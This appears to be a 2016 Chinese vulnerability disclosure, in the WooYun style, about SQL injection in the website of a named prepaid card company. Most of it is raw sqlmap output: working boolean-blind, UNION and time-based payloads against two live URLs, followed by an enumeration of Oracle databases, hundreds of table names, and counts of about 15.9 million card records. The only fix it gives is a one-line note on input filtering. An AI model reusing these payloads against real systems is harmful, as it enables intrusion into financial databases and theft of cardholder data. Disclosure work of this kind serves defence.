2016-03-28: 积极联系厂商并且等待厂商认领中,细节不对外公开 2016-05-12: 厂商已经主动忽略漏洞,细节向公众公开
金融安全之资和信商通卡官网全网数据沦陷/多枚注入打包/涉及大量卡号数据
http://www.zihexin.net/brand/offersinfor.do?action=4&ID=540055
http://www.zihexin.net/client/unit.do?method=info&STORE_ID=4000105444100022" -D "ZHXDB_SETTLE
---Place: GETParameter: ID Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: action=4&ID=540055' AND 1957=1957 AND 'AQSu'='AQSu Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: action=4&ID=540055' UNION ALL SELECT CHR(113)||CHR(103)||CHR(102)||CHR(115)||CHR(113)||CHR(78)||CHR(117)||CHR(70)||CHR(102)||CHR(110)||CHR(98)||CHR(105)||CHR(108)||CHR(100)||CHR(106)||CHR(113)||CHR(111)||CHR(122)||CHR(122)||CHR(113),NULL FROM DUAL-- ---web application technology: Nginx, JSPback-end DBMS: Oracleavailable databases [24]:[*] APEX_030200[*] APPQOSSYS[*] BILL[*] CTXSYS[*] DBSNMP[*] EXFSYS[*] FLOWS_FILES[*] IGNITE_M[*] MDSYS[*] OLAPSYS[*] ORDDATA[*] ORDSYS[*] OUTLN[*] OWBSYS[*] SCOTT[*] SYS[*] SYSMAN[*] SYSTEM[*] WMSYS[*] XDB[*] ZHXBK[*] ZHXBK1[*] ZHXDB_SETTLE[*] ZHXDB_SETTLE_BANK---Place: GETParameter: STORE_ID Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: method=info&STORE_ID=4000105444100022' AND 6214=6214 AND 'mamy'='mamy Type: UNION query Title: Generic UNION query (NULL) - 20 columns Payload: method=info&STORE_ID=-9947' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(108)||CHR(114)||CHR(120)||CHR(113)||CHR(113)||CHR(72)||CHR(111)||CHR(101)||CHR(82)||CHR(98)||CHR(71)||CHR(86)||CHR(77)||CHR(65)||CHR(113)||CHR(105)||CHR(97)||CHR(105)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- Type: AND/OR time-based blind Title: Oracle AND time-based blind (heavy query) Payload: method=info&STORE_ID=4000105444100022' AND 2158=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'OrDw'='OrDw---web application technology: Nginx, JSPback-end DBMS: OracleDatabase: ZHXDB_SETTLE[278 tables]+-------------------------------+| ACC_CARDTYPE_MARKET_BAK || AQUA_EXPLAIN_110408 || AQUA_EXPLAIN_115312 || CREATE_MERCH_TEMP || ETL_TRANS_DEF || FENGHUANGHUI || MOBILE_SEARCH_CARD_LOG || MOBILE_VISIT_LOG || 
STARBUCKS || STARBUCKS_TMP || STA_VIP_ACCCARDTYPE || STA_VIP_ACCCARDTYPEMARKET || STA_VIP_ACCHANDPAYLOG || STA_VIP_ACCMARKETFILE || STA_VIP_ACCMARKETFILEHANDFEE || STA_VIP_ACCPOSFILE || STA_VIP_ACCSIGNCOMPANY || STA_VIP_ACCVALIDCARD || STA_VIP_ACCWASTEBOOK || STA_VIP_ACTICARD || STA_VIP_ACTIMERCHANT || STA_VIP_ACTIMERCHANTTERMINAL || STA_VIP_ACTIPLAN || STA_VIP_ACTIROLE || STA_VIP_ACTIROLEDETAIL || STA_VIP_ALLCANCELTABLE || STA_VIP_CARDTYPE || STA_VIP_CARDTYPEMARKET || STA_VIP_JIFENACCUMWASTEBOOK || STA_VIP_MARKETFILE || STA_VIP_POSFILE || STA_VIP_STRIKELOG || STA_VIP_VALIDCARD || STA_VIP_WASTEBOOK || STA_XSHQ_WASTEBOOK || STA_XSH_WASTEBOOK || STL_BATCHDETAIL || STL_BATCHDETAIL_CP || STL_BATCHDETAIL_SAMSUNG || STL_DEFFTHAN_CPL || STL_DEFFTHAN_VIP || STL_DEFFTHAN_VIP_HIS || STL_DETAIL_NO_SETTLE_MERCH || STL_SYS_CARDTYPE || STL_SYS_CARDTYPE4MERCHANT || STL_SYS_SETTLECARDCATG || STL_SYS_SETTLECARDTYPE || STL_SYS_SETTLECARDTYPE_SPEC || STL_SYS_TRANS || STL_SYS_TRANSMESG || STL_VIP_REVERSAL || STL_VIP_TRANS || STL_VIP_TRANS_HIS || STL_VIP_TRANS_HIS_TEMP || STL_VIP_TRANS_TEMP || ST_ACCOUNT || ST_ACCOUNT_MERCH || ST_ACC_CARDTYPE_AREA || ST_AE_ETL_1824 || ST_AE_ETL_9824 || ST_AE_ETL_9825 || ST_AE_ETL_ACTPAYMENTINFO || ST_AE_ETL_ARBITRATION || ST_AE_ETL_BATCHDETAIL || ST_AE_ETL_CARDBAL || ST_AE_ETL_CHARGEBACK || ST_AE_ETL_CHARGEBACK_APP || ST_AE_ETL_CHARGE_DETAIL || ST_AE_ETL_CHARGE_THAWINFO || ST_AE_ETL_COLLECT || ST_AE_ETL_COLLECT_DETAIL || ST_AE_ETL_COLLECT_MAIN || ST_AE_ETL_COUNTRY || ST_AE_ETL_CURRENCY || ST_AE_ETL_CUST_CARD || ST_AE_ETL_DATAEXPR || ST_AE_ETL_EXCHANGE_RATE || ST_AE_ETL_FILERETURNS || ST_AE_ETL_MCC_RAL || ST_AE_ETL_PARAM || ST_AE_ETL_PPRDATA || ST_AE_ETL_PPRINFO || ST_AE_ETL_RETURNAMT || ST_AE_ETL_SETTLE_FEE || ST_AE_ETL_STATISTIC || ST_AE_ETL_SYSCB_CLEAR || ST_AE_ETL_SYSCHARGEBACK || ST_AE_ETL_THAWINFO || ST_AE_ETL_TRANS || ST_AE_ETL_TRANS_1110 || ST_AE_ETL_TRANS_1240 || ST_AE_ETL_TRANS_1644 || ST_AE_ETL_TRANS_CANCEL || ST_AE_ETL_TRANS_FEE || 
ST_AE_ETL_TRANS_MAIN || ST_AE_ETL_TRANS_TJ || ST_AE_ETL_UNFREEZE_LOG || ST_AGENTRECEIPT_MERCHINFO || ST_ANNOUNCE_INFO || ST_APPLICTION_USERS || ST_AREA || ST_AWARD || ST_AWARD_UPDATE || ST_BAM_ACCOUNTBALANCE || ST_BAM_BANK_ACCOUNT || ST_BAM_BANK_ACTUALDETAIL || ST_BAM_BANK_CUSTOMERMANAGER || ST_BAM_BANK_INFO || ST_BAM_BANK_PARAM || ST_BATCH_LOG || ST_BILL || ST_BILL_PRINT || ST_BRANCH || ST_BRANCH_INFO || ST_CANCEL_CONSTRACT || ST_CARD_TYPE || ST_CHANNEL || ST_CHINA_BANK || ST_CLOSE_STORE || ST_COLLECT || ST_COMPANY || ST_CONSUMER || ST_CREATE_MERCH_INFO || ST_CREDIT_PRINT || ST_EXAMINE || ST_EXAMINE_CHANGE || ST_EXAMINE_CHANGE_BAK || ST_EXAMINE_INFO || ST_EXAMINE_TERM || ST_FIX_ACCOUNT || ST_HEADOFFICE_INFO || ST_HEADOFFICE_MERCH || ST_INVOICE || ST_INVOICE_COLLECT || ST_INVOICE_INFO || ST_INVOICE_MANAGE || ST_INVOICE_MANAGE2 || ST_JKLINFO || ST_JKL_TRANS || ST_KAMEN_CARD_PRODUCT_RELA || ST_KAMEN_PRODUCT || ST_KAMEN_RATE_INFO || ST_KAMEN_SETTLE_INFO || ST_MANUAL_REFUND || ST_MCC_NEW || ST_MCC_NEW_RH_2016 || ST_MCC_NEW_RH_TMP || ST_MERCH_ACCOUNT || ST_MERCH_ACTIVATE || ST_MERCH_APP_ID || ST_MERCH_BASIC_INFO || ST_MERCH_CHANGE || ST_MERCH_LOCK || ST_MERCH_PAYMENT || ST_MERCH_PAYMENT_HIS || ST_MERCH_PAYMENT_LOG || ST_MERCH_PICTURE || ST_MERCH_PREPAYMENT || ST_MERCH_PREPAYMENT_STATISTIC || ST_MERCH_PRINT || ST_MERCH_TERM_REQ || ST_MOBILE_FEE || ST_NETWORKPAY || ST_NT_BANK_ACTUALDETAIL || ST_NT_BANK_FEE || ST_NT_BANK_INFO || ST_NT_BANK_RECEIVECOLLECT || ST_NT_BANK_RECEIVE_STATISTIC || ST_NT_ETL_BATCHDETAIL || ST_NT_ETL_BATCHDETAIL_ERROR || ST_NT_ETL_BATCHDETAIL_MAIN || ST_NT_ETL_BATCHDETAIL_NORATE || ST_NT_ETL_DZ_BCM_SOA || ST_NT_ETL_DZ_CMB_SOA || ST_NT_ETL_DZ_ICBC_HIST || ST_NT_ETL_DZ_ICBC_TDAY || ST_NT_ETL_DZ_SPDB_SOA || ST_NT_ETL_TRANS_BANK || ST_NT_ETL_TRANS_MAIN || ST_PAY || ST_PAYABLE_MESSAGE || ST_PAY_AUTOBAK || ST_PAY_AUTOBAK_BAK || ST_PAY_BAK || ST_PAY_CARDTYPE_41 || ST_PAY_DETAIL || ST_PAY_DETAIL08 || ST_PAY_DETAIL_TEST || ST_PAY_DETAIL_TMP || ST_PAY_TMP || 
ST_POWER || ST_PROC_LOG || ST_RATE || ST_RATE_AMT || ST_RATE_CHANGE || ST_ROLE || ST_ROLE_CONSUMER || ST_ROLE_POWER || ST_ROLE_SETTLE || ST_RUN_LOG || ST_SETTLE_LIST_BATCH || ST_SETTLE_LIST_DAY || ST_SETTLE_LIST_NORATE || ST_SETTLE_MESSAGE || ST_SETTLE_NEWLIST || ST_SETTLE_NEWLIST_TMP || ST_SETTLE_NEWLIST_TMP1 || ST_SETTLE_NEWLIST_TMP2 || ST_SETTLE_NEWLIST_TMP3 || ST_STORE_CLOSE || ST_SUM_CARDDAY || ST_SUM_CARDDAY_TMP || ST_SUM_CARDDAY_VIEW || ST_SUM_CARDDAY_VIEW_PAY || ST_SUM_CARDDAY_VIEW_TEMP1 || ST_SUNING_INFO || ST_TERM || ST_TERM_AUDITFLAG || ST_TERM_AUDITFLAG_HRS || ST_TERM_AUDITINFO || ST_TERM_CHANGE || ST_TERM_CLASS || ST_TERM_COMP || ST_TERM_MODIFY || ST_TERM_YUMINFO || ST_TERM_ZHONGBAI || ST_TON_HLP || ST_XBK_SETTLE_DATE || ST_YUM_ERROR_INFO || ST_YUM_SETTLE_INFO || T1 || TEST1 || TEST2 || TEST3 || TEST4 || TEST_GGS_FOR_DADING || TEST_MDPOS || TEST_ZH || TMP_RUN_LOG || WEB_ACTIVITY || WEB_ACTIVITY_STORE || WEB_ADVISE || WEB_AWARD || WEB_BANK || WEB_BANNER || WEB_CHANGE_USER || WEB_COMPANY_CITY || WEB_DISCOUNT || WEB_GROUP || WEB_ISSUE_ACTIVITY || WEB_ISSUE_AWARD || WEB_ISSUE_BANNER || WEB_ISSUE_DISCOUNT || WEB_ISSUE_LOGO || WEB_ISSUE_NOTICE || WEB_ISSUE_STORE || WEB_ISSUE_STORE_20140928 || WEB_LABEL || WEB_LABEL_MCC || WEB_LOGO || WEB_LOGO_STORE || WEB_MCC || WEB_MERCH || WEB_MERCH_SITE || WEB_NEWS || WEB_NOTICE || WEB_NOTICE_STORE || WEB_POSITION || WEB_SENSITIVE || WEB_SITE || WEB_SITE_BANK || WEB_STORE || WEB_STORE_20140928 || WEB_STORE_LABEL || WEB_WORD_LOG || WEM_TMP || WEM_TMP2 || YUM_20150506 |+-------------------------------+---web application technology: Nginx, JSPback-end DBMS: OracleDatabase: ZHXBK+------------------+---------+| Table | Entries |+------------------+---------+| ACC_CARD_BANK | 15945274 || ACC_VALID_CARD | 15945272 || ACC_CARD_SQL_LOG | 3880 || USER_TABEL | 2 || ACC_CARD_TYPE | 1 || EDITION_FILE | 1 |+------------------+---------+
对用户可控的请求参数进行过滤与校验
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)